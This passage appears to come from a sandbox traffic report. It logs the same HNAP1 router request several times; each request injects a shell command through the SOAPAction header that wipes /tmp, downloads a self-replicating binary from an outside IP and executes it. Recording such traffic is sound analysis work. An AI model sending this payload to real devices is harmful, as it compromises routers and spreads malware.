6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
                      Source: global trafficHTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://15.235.203.214/bolonetwork.mips && chmod +x bolonetwork.mips;./bolonetwork.mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
